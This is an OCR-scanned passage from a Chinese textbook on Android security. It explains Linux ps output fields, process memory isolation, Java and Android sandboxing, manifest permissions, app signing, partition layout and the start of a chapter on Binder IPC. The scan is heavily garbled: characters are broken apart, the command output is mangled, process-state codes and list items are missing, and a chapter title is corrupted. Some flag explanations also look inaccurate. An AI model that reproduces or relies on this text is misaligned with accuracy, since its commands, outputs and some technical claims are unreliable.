命令 的 4 个 基本 字段 数据 外 ， 另 外 还 有 10 个 额外 数据 可 供 查看 ， 这 些 额 外 数据 的 内 容 及 说 明 如 下 所 示 。 


root@ns1 ~]# ps -| 

FS UID PID PPID C PRI NI ADDR SZ WCHAN TTY TIME CMD 
4S 0 9822 9521 0208150 - 1220 wait4 pts/2 00:00:00 su 
4s 0 9970 9822 O 760 - 1294 wait4 pts/2 00:00:00b ash 
4R 0 15354 9970 0 80 0 - 788 - pts/2 00:00:00 ps 


其 中 “F” 表 示 该 进程 状态 的 标志 CFlag) ， 常 用 标志 的 具体 说 明 如 下 所 示 。 
ALIGNWARN: 标识 代码 是 001， 表 示 打 印 警告 信息 。 

STARTING: 标识 代码 是 002 ， 表 示 进 程 正在 初始 化 。 

EXITING: 标识 代码 是 004， 表 示 系 统 正在 关机 。 

PTRACED : 标识 代码 是 010， 表 示 已 调用 ptrace (0) 。 

TRACESYS : 标识 代码 是 020 ， 表 示 跟 踪 System Call。 
FORKNOEXEC : 标识 代码 是 040 ， 表 示 已 执行 fork 但 没有 执行 exec。 
SUPERPRIV: 标识 代码 是 100 ， 表 示 以 root 身 份 执行 。 

DUMPCORE : 标识 代码 是 200 ， 表 示 内 核 转 储 。 

SIGNALED : 标识 代码 是 400 ， 表 示 以 Signal 结 束 进程 。 

而 S 表示 进程 状态 代码 (Process State Codes) ， 可 用 的 代码 及 说 明 如 下 所 示 。 
: 表示 不 可 中 断 的 闲置 状态 (Uninterruptible Sleep) 。 

: 表示 可 执行 的 。 

: 表示 闲置 状态 。 

: 表示 跟踪 或 停止 。 

: 表示 已 死亡 的 进程 (Zombie) 。 

: 表示 没有 足够 的 内 存 页 可 分 配 。 

: 表示 低 优 先 级 的 进程 。 

: 表示 有 内 存 页 分 配 并 锁 在 内 存 内 。 

UID: 进程 执行 者 的 ID (User ID) 。 

PPID:， 父 进程 标识 (Parent Process ID) 。 

PRI: 表示 进程 执行 的 优先 级 〈Priority) 。 

NI: 表示 nice， 是 指 进程 执行 优先 级 的 nice 值 ， 负 值 表示 其 优先 级 较 高 。 
SZ: 表示 Size， 进 程 所 占用 的 内 存 大 小 ， 以 KB 为 单位 。 

WCHAN: 表示 Waiting Channel， 表 示 进 程 或 系统 调用 等 待 时 的 地 址 。 
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而 另 一 种 显示 详细 内 容 信 息 的 参数 为 -u (User) ， 其 主要 功能 是 以 用 户 格式 来 显示 进程 数据 ， 例 如 ， 下 


面 是 部 分 示例 内 容 以 及 新 的 字段 说 明 。 
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[root@ns1 ~]# ps -u 

USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND 
root 9822 00 0.0 4880 168 ріѕ/2 S 12:20 0:00 [sul 

root 9970 0.0 0.4 5176872pts/2 S 12:20 0:00 -bash 

root 15448 0.0 0.3 2644696 pts/2 R 12:30 0:00 ps-u 


?%CPU: CPU 使 用 率 百分比 。 

?%MEM: 内 存 使 用 率 百 分 比 。 

?VSZ: 占用 的 虚拟 内 存 大 小 。 

?RSS: 占用 的 物理 内 存 大 小 。 

?START: 进程 开始 时 间 。 

在 Linux 系统 中 ， 用 户 、 进 程 、 内 核 、 设 备 之 间 的 关系 如 下 。 


口 
口 
口 
口 
口 


每 个 用 户 拥有 多 个 同时 运行 的 进程 ， 多 个 进程 分 别 属于 不 同 的 用 户 。 
用 户 进程 通过 系统 调用 接口 来 访问 操作 系统 的 服务 。 

允许 多 个 用 户 同时 存在 并 运行 不 同 的 进程 。 

通过 设备 驱动 来 访问 硬件 设备 与 资源 ， 例 如 ， 数 据 存储 和 网 络 设备 等 。 
所 有 进程 〈 无 论 是 否 属于 同一 用 户 ) 各 自 运行 于 独立 的 内 存 空 间 中 。 


Linux 系统 通过 使 用 CPU 的 内 存 管理 单元 (MMU) ， 将 整个 系统 内 存 分 为 内 核 区 与 用 户 区 。 操 作 系统 
内 核 本 身 运 行 于 内 核 区 ， 而 用 户 进程 运行 于 用 户 区 。 在 加 载 进程 时 ， 操 作 系统 需要 完成 如 下 两 个 操作 。 


口 
口 


将 进程 的 可 执行 映像 〈 代 码 和 数据 ) 映射 到 虚拟 内 存 空 间 的 用 户 区 中 。 
将 本 身 的 内 核 代码 与 数据 映射 到 虚拟 地 址 空间 的 内 核 区 。 


在 Linux 系统 中 , 通过 虚拟 内 存 管 理 将 内 核 区 和 用 户 区 的 访问 权限 设置 为 不 同 的 级 别 。 其中， 操作 系统 
内 核 具有 最 高 的 虚拟 内 存 访问 权限 ， 而 进程 在 运行 时 能 访问 的 存储 空间 只 限于 其 可 见 的 虚拟 内 存 空间 的 用 
户 区 。 在 进程 的 虚拟 内 存 空 间 的 用 户 区 中 ， 包 含 了 进程 本 身 的 程序 代码 和 数据 ， 可 以 进一步 细 分 为 代码 段 、 


数据 段 、 


堆 、 栈 ， 也 可 以 细 分 为 进程 运行 的 环境 变量 、 命 令 行 参数 传递 区 域 等 。 


在 Linux 操作 系统 中 , 通过 进程 内 存 管 理 机 制 可 以 确保 一 个 进程 无 法 访问 其 他 进程 的 内 存 空间 , 无 法 污 
染 到 其 他 进程 的 内 存 空间 ， 这 样 可 以 保证 应 用 进程 无 法 侵入 操作 系统 空间 和 其 他 进程 的 内 存 空间 中 ， 通 过 
更 改 代 码 的 方式 以 获得 更 高 权限 ， 而 不 论 是 恶意 的 还 是 无 意 的 。 为 了 实现 上 述 安 全 机 制 ，Linux 规定 了 进程 
虚拟 地 址 与 物理 地 址 之 间 的 映射 关系 ， 也 规定 了 进程 镜像 的 内 存 地 址 的 分 配 机 制 。 具 体 说 明 如 下 所 示 。 


口 


ooo 


在 Linux 进 程 的 虚拟 内 存 内 核 区 中 ， 内 核 代码 和 数据 被 映射 到 内 核 区 ， 这 样 可 以 确保 进程 在 运行 中 
得 到 操作 系统 的 支持 。 

Linux 内 核 区 总 是 映射 到 物理 内 存 的 低地 址 空间 。 

进程 有 自己 独立 的 由 内 核 区 和 用 户 区 组 成 的 虚拟 内 存 空 间 ， 这 部 分 被 映射 到 物理 内 存 中 。 

Linux 系 统 将 进程 虚拟 内 存 空间 内 核 区 的 访问 权限 设置 为 0 级 ， 设 置 用 户 区 为 3 级 。 因 为 内 核 访问 虚拟 
内 存 的 权限 为 0 级 ， 而 进程 访问 虚拟 内 存 的 权限 为 3 级 ， 所 以 进程 代码 不 能 访问 内 核 区 的 代码 与 数据 。 
在 进程 虚拟 内 存 用 户 区 中 , 进程 的 可 执行 映像 的 代码 和 数据 被 映射 到 虚拟 内 存 的 用 户 区 ,也 就 是 进 
程 用户 区 由 进程 的 程序 代码 和 数据 组 成 。 用 户 区 映射 到 物理 地 址 内 核 映 射 区 以 上 的 任意 地 址 空间 。 


33 沙 箱 模型 


aa 知识 点 讲解 : 光盘 :视频 \ 知 识 点 \ 第 3 章 \ 沙 箱 模型 .avi 
沙 箱 是 一 种 安全 环境 ， 现 实 中 的 沙 箱 (SandBox) 是 一 种 儿童 玩具 ， 例 如 KFC (肯德基 ) 中 一 个 装 满 小 
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球 的 容器 ， 孩 子 们 可 以 在 其 中 随意 玩 贾 ， 具 有 保护 儿童 的 作用 。 最 近 儿 年 来 ， 随 着 网 络 安全 问题 的 日 益 突 
出 ， 人 们 更 多 地 将 沙 箱 技术 应 用 在 网 上 冲浪 领域 。 从 技术 实现 角度 来 说 ， 其 原理 是 从 原 有 的 阻止 可 疑 程序 
对 系统 访问 ， 转 换 为 将 可 疑 程序 对 磁盘 、 注 册 表 等 的 访问 重 定向 到 指定 文件 夹 下 ， 从 而 消除 对 系统 的 危害 。 
本 节 将 详细 讲解 Android 系统 沙 箱 模 型 的 基本 知识 ， 为 读者 学 习 本 书后 面 的 知识 打下 基础 。 


3.3.1 Java 中 的 沙 箱 模 型 


在 主流 开发 语言 Java 技术 中 , 沙 箱 具 有 很 重要 的 安全 意义 。 为 了 确保 Java 技术 不 会 被 恶意 目的 所 利用 ， 
Java 设计 了 一 套 精 密 的 安全 模型 ， 即 安全 管理 器 (Security Manager) ， 该 模型 可 以 检查 有 权 使 用 的 所 有 系 
统 资源 。 在 默认 的 情况 下 ， 只 允许 无 害 的 操作 ， 要 想 允 许 执行 其 他 操作 ， 代 码 需 得 到 数字 签名 ， 用 户 必须 
得 到 数字 认证 。Java 语言 规定 ， 在 沙 箱 中 的 程序 存在 如 下 限制 。 
口 不 能 运行 任何 本 地 可 执行 程序 。 
口 不 能 从 本 地 计算 机 文件 系统 中 读 取 任 何 信息 ， 也 不 能 向 本 地 计算 机 文件 系统 中 写 入 任何 信息 。 
О 不 能 查看 除 Java 版 本 信息 ， 以 及 少数 儿 个 无 害 的 操作 系统 详细 信息 外 的 任何 有 关 本 地 计算 机 的 信 
息 。 特 别 需 要 注意 的 是 ， 在 沙 箱 中 不 能 查看 用 户 名 和 E-mail 地 址 等 信息 。 

口 远程 加 载 的 程序 不 能 与 除 下 载 程序 所 在 的 服务 器 之 外 的 任何 主机 通信 ， 这 个 服务 器 被 称 为 源 主机 
(originating host) 。 这 条 规则 通常 称 为 “远程 代码 只 能 与 家 人 通话 ”这 条 规则 将 会 确保 用 户 不 会 
被 代码 探查 到 内 部 网 络 资源 (在 Java SE 6 rB, Java Web Start 应 用 程序 可 以 与 其 他 网 络 连接 ， 但 必 
须 得 到 用 户 的 同意 ) 。 


3.3.2 Android 系统 中 的 沙 箱 机 制 


随 着 沙 箱 技术 盛行 ， 很 多 主流 公司 的 产品 都 采用 了 沙 箱 技术 来 保证 上 网 安全 ， 例 如 360 浏览 器 。 而 对 
于 开源 的 Android 系统 来 说 ， 也 特意 引入 了 这 样 的 安全 概念 。 在 传统 的 Linux 中 ， 一 个 用 户 ID 识别 一 个 
给 定 用 户 。 而 在 Android 系统 中 ， 一 个 用 户 ID 识别 一 个 应 用 程序 。 应 用 程序 在 安装 时 被 分 配 用 户 ID, JW 
用 程序 在 设备 上 的 运行 期 间 内 ， 用 户 ID 保持 不 变 。 权 限 是 关于 允许 或 限制 应 用 程序 而 不 是 用 户 ) 访问 
设备 资源 。 

Android 系统 通过 使 用 沙 箱 的 概念 来 实现 应 用 程序 之 间 的 分 离 和 权限 ， 以 允许 或 拒绝 一 个 应 用 程序 访问 
设备 的 资源 ， 例 如 文件 和 目录 、 网 络 、 传 感 器 和 АРІ. EFE, Android 使 用 一 些 Linux 实用 工具 来 实现 
应 用 程序 被 允许 执行 的 操作 ， 例 如 ， 进 程 级 别 的 安全 性 、 与 应 用 程序 相关 的 用 户 /组 ID 以 及 权限 。 

Android 应 用 程序 运行 在 它们 自己 的 Linux 进程 上 ， 并 被 分 配 一 个 唯一 的 用 户 ID。 在 默认 情况 下 ， 运 
行 在 基本 沙 箱 进程 中 的 应 用 程序 没有 被 分 配 权限 ,因而 防止 了 此 类 应 用 程序 访问 系统 或 资源 。 但 是 Android 
应 用 程序 可 以 通过 应 用 程序 的 manifest 文件 来 请 求 权限 。 

要 想 允 许 其 他 应 用 程序 可 以 访问 Android 应 用 程序 的 资源 ， 可 以 通过 如 下 两 点 来 实现 。 

(1) 声明 适当 的 manifest 权限 。 
(2) 在 同一 进程 中 运行 其 他 受信 任 的 应 用 程序 ， 从 而 共享 对 其 数据 和 代码 的 访问 。 

在 Android 系统 中 , 可 以 在 相同 的 进程 运行 不 同 的 应 用 程序 。 此 时 必须 先 使 用 相同 的 私 钥 签 署 这 些 应 用 
程序 ， 然 后 使 用 manifest 文件 为 其 分 配 相同 的 Linux 用 户 ID， 这 样 可 以 通过 用 相同 的 “ 值 /名 ”来 定义 
manifest 属性 android:sharedUserld 的 方式 实现 。 

在 Android 系统 中 ， 如 下 应 用 间 的 安全 性 由 Linux 操作 系统 的 标准 进程 级 安全 机 制 实现 。 

口 应 用 程序 的 进程 之 间 的 安全 。 

口 应 用 程序 与 操作 系统 之 间 的 安全 。 
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在 默认 状态 下 ，Android 应 用 程序 之 间 无 法 交互 ， 运 行 在 进程 沙 箱 内 的 应 用 程序 没有 被 分 配 权限 ， 这 样 
就 无 法 访问 系统 或 资源 。 所 以 无 论 是 直接 运行 于 操作 系统 之 上 的 应 用 程序 ， 还 是 运行 于 Dalvik VM 机 的 应 
用 程序 ， 都 会 得 到 同样 的 安全 隔离 与 保护 ， 被 限制 在 各 自 “ 沙 箱 ” 内 的 应 用 程序 互 不 干扰 ， 这 样 做 的 好 处 
是 降低 对 系统 与 其 他 应 用 程序 的 损害 。Android 应 用 程序 通过 使 用 沙 箱 机 制 ， 可 以 实现 互相 不 具备 信任 关系 
应 用 程序 的 隔离 ， 以 便于 独自 运行 。 


3.4 Android 应 用 程序 的 安全 机 制 


Gl 知识 点 讲解 : 光盘 :视频 \ 知 识 点 \ 第 3 章 \Android 应 用 程序 的 安全 机 制 .avi 
在 现实 应 用 中 ，Android 系统 面临 的 安全 问题 主要 来 自 针 对 应 用 程序 的 攻击 ， 并 且 病 毒 程序 也 主要 是 通 
过 恶意 应 用 程序 传播 的 。 在 本 节 的 内 容 中 ， 将 简要 讲解 Android 应 用 程序 的 安全 机 制 的 基本 知识 。 


3.4.1 AndroidManifest.xml 文件 的 权限 机 制 


在 安装 Android 应 用 程序 时 分 配 一 个 用 户 标志 CUID) ， 目 的 是 区 别 于 其 他 应 用 程序 以 保护 自己 的 数据 
不 被 其 他 应 用 获取 。 在 Android 系统 中 , 会 根据 不 同 的 用 户 和 组 来 分 配 不 同 权限 ,， 例如, 分 别 设置 访问 网 络 、 
访问 GPS 数据 等 权限 功能 。 在 底层 应 用 模块 中 ， 上 述 Android 权限 映射 为 Linux 的 用 户 与 组 权限 。 

在 Android 系统 中 的 文件 AndroidManifest.xml 中 通过 <permission>、<permission-group> 和 <permission-tree> 
等 标签 来 指定 应 用 层 显 式 权限 ， 设 置 应 用 程序 包 〈.apk 文件 ) 的 权限 信息 。 如 果 想 要 申请 某 个 具体 的 权限 ， 
需要 使 用 <uses-permission> 标 签 来 指定 。 在 声明 一 个 权限 时 ， 需 要 声明 包含 权限 名 称 、 所 需 的 权限 组 与 保护 
级 别 。 

在 Android 系统 中 ， 权 限 组 会 根据 权限 的 功能 划分 成 不 同 的 集合 ， 其 中 又 会 包含 多 个 具体 权限 ， 例 如 ， 
收发 短信 、 无 线 上 网 等 功能 可 以 被 划 入 “收费 数据 业务 ”权限 组 。 

在 Android 系统 中 ， 可 以 将 权限 的 保护 级 别 分 为 Normal、Dangerous、Signature 和 Signatureorsystem 4 
种 ， 通 过 这 4 种 不 同 的 级 别 限定 了 应 用 程序 行使 此 权限 时 的 认证 方式 ， 具 体 说 明 如 下 所 示 。 

口 Normal 级 别 : 只 要 申请 后 就 可 以 使 用 。 

口 Dangerous 级 别 : 在 安装 时 经 用 户 确认 才 可 以 使 用 。 

O Signature 和 Signatureorsystem 级 别 : 需要 应 用 程序 必须 为 系统 用 户 , 如 OEM 制 造 商 或 ODM 制 造 商 等 。 

另外 ， 如 果 没 有 在 文件 AndroidManifest.xml 中 声明 某 个 框架 层 与 系统 层 逐 级 验证 权限 ， 那 么 程序 运行 
时 会 报错 ， 此 时 可 以 通过 命令 行 调试 工具 logcat 查看 系统 日 志 可 发 现 需要 某 权 限 的 错误 信息 。 

在 Android 系统 中 ， 共 享 UID 的 应 用 程序 可 以 与 系统 另 一 用 户 程序 使 用 同一 签名 ， 也 可 共享 同一 个 权 
限 。 此 类 机 制 可 以 通过 文件 在 AndroidManifest 文件 中 设置 sharedUserld 的 方式 实现 ， 例 如 ， 通 过 如 下 代码 
可 以 获得 系统 权限 ， 但 是 这 种 程序 只 对 系统 软件 起 作用 。 

android:sharedUserld-"android.uid.shared" 

另外 ， 读 者 需要 注意 的 是 ， 从 Android 2.3 版 本 之 后 ， 即 使 有 root 权限 也 无 法 执行 很 多 底层 命令 和 API. 
例如 ，su 到 root 用 户 ， 执 行 Is 等 命令 都 会 播报 没有 权限 之 类 的 错误 。 


3.4.2 ”发 布 签名 机 制 


在 开发 Android 应 用 程序 时 ， 开 发 者 都 必须 对 发 布 的 程序 设置 数字 签名 ， 也 就 是 使 用 私有 密 钥 数字 签 
署 一 个 给 定 的 应 用 程序 ， 以 便 及 时 识别 出 代码 的 作者 ， 并 检测 应 用 程序 是 否 发 生 了 改变 。 这 样 可 以 在 相同 
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签名 的 应 用 程序 之 间 建 立信 任 ， 从 而 使 某 些 应 用 程序 可 以 安全 地 实现 资源 共享 。 

在 生成 Android 应 用 程序 签名 时 ， 需 要 生成 私有 密 钥 与 公共 密 钥 对 ， 用 私有 密 钥 签署 公共 密 钥 证 书 。 虽 
然 在 Android 应 用 程序 商店 和 安装 包 中 不 会 安装 没有 数字 证 书 的 应 用 , 但 是 不 需要 权威 机 构 来 认证 签名 的 数 
字 证 书 。Android 应 用 程序 签名 工作 可 以 通过 第 三 方 完 成 ， 例 如 ，OEM 厂商 、 运 营 商 及 应 用 程序 商店 等 ， 
也 可 以 由 开发 者 自己 完成 签名 ， 这 就 是 自 签名 。 自 签名 允许 开发 者 不 依赖 于 任何 第 三 方 自由 发 布 应 用 程序 。 

在 安装 Android 应 用 程序 的 АРК 文件 时 ， 系 统 安装 程序 会 先 检查 APK 是 否 被 签名 ， 智 能 安装 有 签名 的 
程序 。 当 升级 这 个 Android 应 用 程序 时 , 需要 检查 新 版 应 用 的 数字 签名 与 已 安装 的 应 用 程序 的 签名 是 否 相 同 。 
如 果 不 相同 ， 则 会 被 当 作 一 个 全 新 的 应 用 程序 来 对 待 。 在 Android 应 用 中 ， 由 同一 个 开发 者 设计 的 多 个 应 用 
程序 可 采用 同一 私 钥 签 名 。 具 体 方法 是 在 manifest 文件 中 声明 共享 用 户 的 ID， 人 允许 它们 在 相同 的 进程 中 运 
行 ， 此 时 这 些 所 属 同一 开发 者 的 应 用 程序 便 可 以 共享 代码 和 数据 资源 。Android 开发 者 们 有 可 能 把 安装 包 命 
名 为 相同 的 名 字 ， 通 过 不 同 的 签名 可 以 把 它们 区 分 开 ， 也 保证 了 签名 不 同 的 包 不 被 替换 掉 ， 同 时 有 效 地 防 
止 了 恶意 软件 替换 安装 的 应 用 。 

Android 提供 了 基于 签名 的 权限 检查 ， 应 用 程序 间 具 有 相同 的 数字 签名 ， 它 们 之 间 可 以 以 一 种 安全 的 方 
式 共享 代码 和 数据 。 


3.5 ”分 区 加 载 机 制 


Фи 知识 点 讲解 : 光盘 :视频 \ 知 识 点 \ 第 3 章 \ 分 区 加 载 机 制 .avi 

在 Android 设备 中 ， 整 个 分 区 的 类 别 如 下 所 示 。 

(1) 系统 分 区 

在 Android 系统 中 , 系统 分 区 通常 被 加 载 为 只 读 分 区 , 包含 操作 系统 内 核 、 系 统 函 数 库 、 实 时 运行 框架 、 
应 用 框架 与 系统 应 用 程序 等 。Android 系统 分 区 由 OEM 厂商 在 出 厂 时 植 入 ， 外 界 不 能 更 改 。 当 Android 系 
统 出 现 安全 问题 时 ， 用 户 可 以 启动 进入 “安全 模式 ”， 选 择 加 载 只 读 的 系统 分 区 ， 而 不 加 载 数据 分 区 中 的 
数据 内 容 ， 隔 离 第 三 方 应 用 程序 可 能 带 来 的 安全 威胁 。 

(2) Cache 分 区 

在 Android 系统 中 ，Cache 分 区 即 目录 分 区 ， 在 不 同 的 目录 加 载 不 同 的 内 容 ， 有 具体 说 明 如 下 所 示 。 

口 /system/app 目 录 : 存放 系统 自 带 应 用 程序 APK。 

口 /system/lib 目 录 : 存放 系统 库 文件 。 

口 /system/bin 和 /system/xbin 目 录 : 存放 是 系统 管理 命令 等 。 

O /system/framework 目 录 : 存放 Android 系 统 应 用 框架 的 JAR 文 件 。 

(3) 数据 分 区 

在 Android 系统 中 ， 数 据 分 区 用 于 存储 各 类 用 户 数 据 与 应 用 程序 。 一 般 需要 对 数据 分 区 设 定 容量 限额 
并 且 防 止 黑 客 向 数据 分 区 非法 写 入 数据 ， 或 者 防止 创建 非法 文件 对 数据 分 区 进行 恶意 破坏 。 当 出 现 问题 时 
可 以 在 “安全 模式 ”下 设置 不 加 载 数据 分 区 ， 或 者 不 启动 数据 分 区 中 的 应 用 程序 。 在 有 些 情况 下 ， 甚 至 可 
以 直接 重新 格式 化 数据 分 区 ， 通 过 恢复 数据 的 方式 恢复 被 损坏 的 系统 。 在 通常 情况 下 ，Android 数据 分 区 加 
载 的 目录 为 /data， 在 此 目录 下 主要 包括 以 下 子 目录 。 

口 /data/data 目 录 : 保存 的 是 所 有 APK 程 序数 据 。 每 个 APK 对 应 自己 的 Data 目 录 ， 即 在 /data/data 目 录 下 

有 一 个 与 Package 名 字 一 样 的 目录 。APK 只 能 在 此 目录 下 操作 ， 不 能 访问 其 他 APK 的 目录 。 
口 /data/app 目录 : 保存 的 是 用 户 安装 的 APK。 


e. 


口 /data/system 目 录 : 保存 的 是 packages.xml、packages.list 和 appwidgets.xml 等 文件 ， 用 于 记录 安装 的 
软件 及 Widget 信 息 等 。 
O /data/misc 目 录 : 保存 的 是 WiFi 账 号 与 VPN 设 置 等 。 
(4) SD 卡 分 区 
在 Android 系统 中 ，SD 卡 是 外 置 设备 ， 可 以 从 其 他 计算 机 系统 上 进行 操作 ， 而 完全 不 受 Android 系统 
所 控制 。 另 外 ，SD 卡通 常 是 FAT 格式 的 文件 系统 ， 根 本 无 法 设置 用 户 许可 权限 。 虽 然 Android 允许 在 加 载 
文件 系统 时 可 以 对 整个 FAT 文件 系统 设置 读 写 权限 ， 但 是 不 能 针对 FAT 中 的 个 别 文件 进行 特殊 操作 。® 


(D 本 章 内 容 参 考 了 http://mobile.51cto.com/netsecurity-292955.htm。 


第 4 章 Android MfS S Eh 


在 Android 系统 中 ， 应 用 程序 都 是 由 Activity 和 Service 组 成 的 。Service 通常 运行 在 独立 的 进程 中 ， 而 
Activity 既 可 运行 在 同一 个 进程 中 ， 也 可 运行 在 不 同 的 进程 中 。 不 在 同一 个 进程 中 的 Activity 或 Service 是 如 
何 实现 通信 功能 的 呢 ? 答案 是 使 用 Binder 进程 间 通 信 机 人 制 . 本 章 将 详细 分 析 Android 的 进程 通信 机 制 Binder 
的 具体 实现 ， 使 读者 了 解 Binder 通信 机 制 的 安全 策略 。 


4.1 进程 和 线程 安全 


бы 知识 点 讲解 : 光盘 :视频 \ 知 识 点 \ 第 4 章 \ 进 程 和 线程 安全 .avi 

当 运行 Android 应 用 程序 的 第 一 个 组 件 时 会 启动 一 个 Linux 进程 ， 并 执行 其 中 的 一 个 单一 的 线程 。 在 默 
认 情 况 下 ， 应 用 程序 所 有 的 组 件 都 会 在 当前 进程 的 这 个 线程 中 运行 。 当 然 ， 也 可 以 设置 在 其 他 进程 中 运行 
这 个 组 件 ， 而 且 可 以 为 任意 进程 孕育 出 其 他 线程 。 在 了 解 Binder 通信 机 制 之 前 ， 先 讲解 进程 和 线程 安全 方 
面 的 知识 。 


4.1.1 进程 安全 


在 Android 系统 中 ， 通 过 manifest 文件 控制 组 件 运行 所 在 的 进程 。 在 <activity>、<service>、<receiver> 
和 <provider> 等 组 件 元 素 中 ， 都 拥有 一 个 process 属性 来 设置 应 在 哪个 进程 中 运行 这 个 组 件 。 这 些 process 
属性 可 以 被 设置 为 使 每 个 组 件 运 行 于 它 自己 的 进程 之 内 ,或 一 些 组 件 共享 一 个 进程 而 其 余 的 组 件 不 这 么 做 。 
另外 ， 也 可 以 设置 为 在 一 个 进程 中 运行 不 同 的 应 用 程序 组 件 ， 这 样 可 以 使 应 用 程序 的 各 个 组 成 部 分 共享 同 

-个 Linux 用 户 ID， 并 且 可 以 赋予 同样 的 权限 。 元 素 <application> 也 有 一 个 process 属性 ， 通 过 此 属性 可 以 
设 定 所 有 组 件 的 默认 值 。 

在 Android 系统 中 , 所 有 的 组 件 实例 都 位 于 特定 进程 的 主线 程 内 ， 而 对 这 些 组 件 的 系统 调用 也 将 由 那个 
线程 进行 分 发 。 一 般 不 会 为 每 个 实例 创建 线程 。 因 此 ， 某 些 方法 总 是 运行 在 进程 的 主线 程 内 ， 这 些 方法 包 
括 诸如 View.onKeyDown0 这 样 报告 用 户 动作 以 及 生命 周期 通告 的 。 这 意味 着 当 组 件 在 被 系统 调用 时 ， 不 应 
该 被 施行 长 时 间 的 阻塞 操作 (如 网 络 相关 操作 或 是 循环 计算 ) ， 因 为 这 样 会 同时 阻塞 位 于 这 个 进程 中 的 其 
他 组 件 的 运行 。 

在 Android 系统 中 ,， 当 需要 内 存 运 行为 用 户 进行 服务 的 进程 时 , 如 果 发 生 可 用 内 存 不 足 的 情形 , Android 
系统 可 能 会 关闭 一 个 进程 ， 同 时 会 销毁 在 这 个 进程 中 运行 的 应 用 程序 。 当 后 面 再 次 需要 这 些 进程 工作 时 ， 
会 为 这 些 组 件 重新 创建 进程 。 

在 Android 系统 中 ， 当 决定 应 该 结束 哪个 进程 时 会 衡量 进程 对 于 用 户 的 相对 重要 性 。 例 如 ， 相 对 于 一 个 
仍 有 用 户 可 见 的 Activity 进程 ， 它 更 有 可 能 去 关闭 一 个 其 Activity 已 经 不 为 用 户 所 见 的 进程 。 由 此 可 见 ， 决 
定 是 否 关 闭 一 个 进程 的 主要 根据 是 在 该 进程 中 运行 的 组 件 的 状态 。 


4.1.2 ”线程 安全 


在 Android 系统 中 , 虽然 可 以 将 应 用 程序 限制 在 一 个 单独 的 进程 中 , 但 是 有 时 仍然 需要 孕育 出 一 个 新 线 
程 以 处 理 后 台 任务 。 在 Android 系统 中 , 因为 用 户 界面 必须 要 及 时 的 对 用 户 操作 做 出 响应 , 所 以 控制 Activity 
的 线程 的 任务 就 非常 繁杂 ， 而 不 仅仅 是 去 处 理 一 些 诸如 网 络 下 载 之 类 的 简单 并 耗 时 的 操作 。 TE Android 系统 
中 规定 ， 不 能 在 瞬间 完成 的 任务 都 需要 被 安排 到 不 同 的 线程 中 去 。 

在 Android 系统 中 ， 需 要 以 标准 Java Thread 对 象 代码 来 创建 一 个 线程 。 在 Android 中 提供 了 很 多 便于 管 
理 线 程 的 类 ， 具 体 说 明 如 下 所 示 。 

口 Looper: 用 于 在 一 个 线程 中 运行 一 个 消息 循环 。 

Q Handler: 用 于 处 理 消息 。 

口 HandlerThread: 用 于 使 用 一 个 消息 循环 启用 一 个 线程 。 


413 ”实现 线程 安全 方法 


在 Linux 操作 系统 中 ， 传 统 进程 间 通 信 (IPC) 有 管道 、 命 名 管道 、 信 号 量 、 共 享 内存 、 消 息 队 列 、 网 
络 和 Unix 套 接 字 等 多 种 方式 。 虽 然 Android 系统 可 以 使 用 传统 的 Linux 进程 通信 机 制 ， 但 是 其 实 Android 
的 应 用 程序 儿 乎 不 再 使 用 这 些 传统 的 方式 ， 取 而 代 之 的 是 通过 Intent, Activity, Service, Content Provider 
方式 实现 组 件 之 间 的 相互 通信 。Android 应 用 程序 通常 是 由 一 系列 Activity 和 Service 组 成 的 ， 一 般 Service 
运行 在 独立 的 进程 中 ，Activity 既 可 能 运行 在 同一 个 进程 中 ， 也 可 能 运行 在 不 同 的 进程 中 。 在 不 同 进程 中 的 
Activity 和 Service 要 协作 工作 ， 实 现 完 整 的 应 用 功能 ， 必 须 进行 通信 ， 以 获取 数据 与 服务 。 这 就 回归 到 
Client-Server 模式 。 基 于 Client-Server 的 计算 模式 广泛 应 用 于 分 布 式 计算 的 各 个 领域 ， 如 互联 网 、 数 据 库 访 
问 等 。 在 嵌入 式 智能 手持 设备 中 , 为 了 以 统一 模式 向 应 用 开发 者 提供 功能 , 这 种 Client-Server 方式 无 处 不 在 。 
Android 系统 中 的 媒体 播放 、 音 视频 设备 、 传 感 器 设备 〈 加 速度 、 方 位 、 温 度 、 光 亮度 等 ) 由 不 同 的 服务 端 
(Server) 负责 管理 ， 使 用 服务 的 应 用 程序 只 要 作为 客户 端 〈Client) 向 服务 端 (Server) 发 起 请 求 即 可 。 

在 Android 系统 中 , 有 时 编写 的 应 用 方法 可 能 会 被 多 个 线程 所 调用 , 所 以 必须 保证 被 编写 的 线程 是 安全 的 ， 
例如 ， 对 于 使 用 RPC 机 制 中 的 可 以 被 远程 调用 方法 来 说 ， 更 需要 线程 是 安全 的 。 在 Android 系统 中 ， 当 一 个 
IBinder 对 象 中 实现 的 方法 调用 源 自 这 个 IBinder 对 象 所 在 的 进程 时 , 将 会 在 调用 者 的 线程 中 执行 这 个 方法 。 但 
是 ， 如 果 这 个 调用 源 自 其 他 的 进程 ， 那 么 将 会 在 一 个 线程 池 中 选 出 的 线程 中 运行 这 个 方法 。 通 常 由 Android 
来 管理 这 个 线程 池 ， 并 与 IBinder 保存 于 同一 进程 中 ， 并 且 这 个 方法 不 会 在 进程 的 主线 程 内 执行 。 

在 Android 系统 中 ， 内 容 提供 者 能 接受 源 自 其 他 进程 的 请 求 数据 。 虽 然 Android 系统 中 的 类 
ContentResolver 和 类 ContentProvider 隐藏 了 交互 沟通 过 程 的 管理 细节 , 但 是 ContentProvider 会 通过 query(). 
insert(). delete(). update()#ll getType0 等 方法 来 响应 这 些 请 求 ， 而 这 些 方法 也 都 是 在 内 容 提 供 者 的 进程 中 所 
包含 的 线程 池 提供 的 ， 而 并 不 是 进程 的 主线 程 本 身 。 

在 Android 系统 中 ,因为 Android 应 用 程序 有 自己 的 UID, 所 以 可 以 鉴别 进程 身份 .而 传统 的 Client-Server 
方式 则 影响 了 进程 间 通 信 机 制 的 效率 和 安全 性 ， 有 具体 说 明 如 下 所 示 。 

(1) 效率 问题 

通过 传统 的 管道 、 命 名 管道 和 消息 队列 传输 机 制 ， 会 需要 多 次 复制 数据 的 操作 过 程 ， 数 据 会 先 从 发 送 
进程 的 用 户 区 缓存 复制 到 内 核 区 缓存 中 ， 然 后 再 从 内 核 缓存 复制 到 接收 进程 的 用 户 区 缓存 中 。 因 为 整个 单 
向 传输 过 程 至 少 需要 两 次 复制 操作 ， 所 以 系统 开销 大 。 

(2) 安全 问题 

